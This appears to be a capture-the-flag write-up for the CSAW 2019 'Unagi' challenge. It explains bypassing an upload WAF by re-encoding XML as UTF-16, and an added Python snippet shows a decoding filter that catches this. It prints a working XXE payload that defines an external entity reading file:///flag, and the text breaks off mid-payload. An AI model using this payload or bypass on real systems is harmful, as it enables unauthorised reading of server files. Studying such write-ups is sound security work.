[CSAWQual 2019]Web_Unagi
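Only XML files can be uploaded, so XXE is the likely issue.
Uploading the file directly shows it was intercepted by the WAF; converting it to UTF-16 encoding bypasses the WAF.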
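Why the re-encoded upload passes a byte-level filter, and a check that decodes the document before inspecting it. This is an added example, not code from the original write-up or the challenge; the function names and the sample document are constructed for illustration.

```python
import codecs

# Constructed sample with the same DOCTYPE/ENTITY shape as the upload on this page.
SAMPLE = ('<!DOCTYPE users[\n<!ENTITY a SYSTEM "file:///flag">\n]>\n'
          '<users><user><name>&a;</name></user></users>')

# BOMs, UTF-32 first so its LE mark is not mistaken for the UTF-16 LE mark.
BOMS = [
    (codecs.BOM_UTF32_LE, "utf-32-le"),
    (codecs.BOM_UTF32_BE, "utf-32-be"),
    (codecs.BOM_UTF8, "utf-8"),
    (codecs.BOM_UTF16_LE, "utf-16-le"),
    (codecs.BOM_UTF16_BE, "utf-16-be"),
]

def naive_waf_blocks(data: bytes) -> bool:
    """Byte-level signature match: the kind of check UTF-16 slips past."""
    return b"<!ENTITY" in data or b"<!DOCTYPE" in data

def sniff_encoding(data: bytes):
    """Return (codec, bom_length), guessing the way an XML parser would."""
    for bom, name in BOMS:
        if data.startswith(bom):
            return name, len(bom)
    # No BOM: a document starts with '<', so NUL placement reveals UTF-16.
    if data[:2] == b"<\x00":
        return "utf-16-le", 0
    if data[:2] == b"\x00<":
        return "utf-16-be", 0
    return "utf-8", 0

def normalized_filter_blocks(data: bytes) -> bool:
    """Decode to text first, then look for DTD declarations."""
    codec, skip = sniff_encoding(data)
    try:
        text = data[skip:].decode(codec)
    except UnicodeDecodeError:
        return True  # undecodable upload: reject rather than pass it on
    if "\x00" in text:
        return True  # NUL is not legal XML; encoding was guessed wrong
    return "<!DOCTYPE" in text or "<!ENTITY" in text
```

A filter like this is defence in depth; the parser behind it should still be configured not to resolve external entities.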
<!--filename:1.xml-->
<!--author:ta3shi-->
<!DOCTYPE users[
<!ENTITY a SYSTEM "file:///flag">
]>
<users>
<user>
<username>Alice</username>
<password>passwd1</password>
<name>&a;</name>
<email>&a;</email>
<intro>&a;</intro>
<group>&a;</group>
</user>
<user>
<username>bob</username>
<password>passwd2</